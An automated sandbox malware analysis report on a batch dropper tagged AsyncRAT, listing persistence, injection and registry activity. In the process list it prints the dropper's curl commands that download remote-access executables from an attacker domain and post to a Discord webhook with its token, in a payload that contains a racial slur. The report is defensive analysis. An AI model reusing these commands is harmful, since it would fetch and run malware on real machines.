Malware Analysis Report

2024-08-06 13:12

Sample ID 240617-1asdzayepj
Target dropper_1.bat
SHA256 9ef018c8c1dfaf529ee32c2a9a60b4c93d053d0691e6a874c58c3e43347d3861
Tags
asyncrat persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9ef018c8c1dfaf529ee32c2a9a60b4c93d053d0691e6a874c58c3e43347d3861

Threat Level: Known bad

The file dropper_1.bat was found to be: Known bad.

Malicious Activity Summary

asyncrat persistence rat

AsyncRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Async RAT payload

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Runs regedit.exe

Modifies data under HKEY_USERS

Enumerates system info in registry

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-17 21:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-17 21:27

Reported

2024-06-17 21:29

Platform

win7-20240611-en

Max time kernel

122s

Max time network

126s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\dropper_1.bat"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1720 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1720 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1720 wrote to memory of 2716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\dropper_1.bat"

C:\Windows\system32\chcp.com

chcp 65001

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-17 21:27

Reported

2024-06-17 21:29

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

149s

Command Line

winlogon.exe

Signatures

AsyncRat

rat asyncrat

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4856 created 604 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Resources\$77-sdchost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Resources\$77-penisware.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Resources\$77-scchost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe" C:\Windows\Resources\$77-sdchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf C:\Windows\Resources\$77-penisware2.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4856 set thread context of 220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Resources\$77-sdchost.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\Resources\$77-scchost.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\Resources\$77-penisware.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\Resources\$77-penisware2.exe C:\Windows\system32\curl.exe N/A
File created C:\Windows\Resources\$77-install.exe C:\Windows\system32\curl.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133631333142223269" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{4E6B2584-18D6-46D1-966C-53E502273C22} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{962D9999-CA7C-49E7-A38D-7C858997F3DB} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs regedit.exe

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\Resources\$77-scchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-penisware2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-scchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-scchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-sdchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-penisware2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-sdchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Resources\$77-penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\$77-scchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\$77-penisware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\$77-scchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\$77-penisware.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\helppane.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\Resources\$77-penisware2.exe N/A
N/A N/A C:\Windows\helppane.exe N/A
N/A N/A C:\Windows\helppane.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3548 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3548 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 3548 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 4020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 3260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 4620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 4620 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 1812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 2680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 2680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3548 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 3556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 5108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 5108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 3192 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 1992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 3508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 2604 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 3944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 3944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4320 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 4352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 4352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 5052 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3548 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3548 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dropper_1.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\curl.exe

C:\Windows\system32\curl "https://discord.com/api/webhooks/1250147812503584798/kM-golxLeBjZkcQMdjxFBJ8cEzMjI9zUI-ekNo5GaP0xIAPrgIM71FdqGQFE9zwSksRt" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone"",""embeds"":[{""title"":""Loader Was Ran By Admin!"",""color"":16711680,""author"":{""name"":""Sexy Niggas""},""footer"":{""text"":""UD Loader - Mon 06/17/2024 21:27:15.44""}}],""username"":""UD Loader"",""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3764,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=3800 /prefetch:8

C:\Windows\system32\curl.exe

C:\Windows\system32\curl "https://penisware.com/r77/Install.exe" --output "C:\Windows\Resources\$77-install.exe"

C:\Windows\system32\curl.exe

C:\Windows\system32\curl https://penisware.com/xworm/sdchost.exe --output C:\Windows\Resources\$77-sdchost.exe

C:\Windows\system32\curl.exe

C:\Windows\system32\curl https://penisware.com/venom/scchost.exe --output C:\Windows\Resources\$77-scchost.exe

C:\Windows\system32\curl.exe

C:\Windows\system32\curl https://penisware.com/xworm/penisware-gold.exe --output C:\Windows\Resources\$77-penisware.exe

C:\Windows\system32\curl.exe

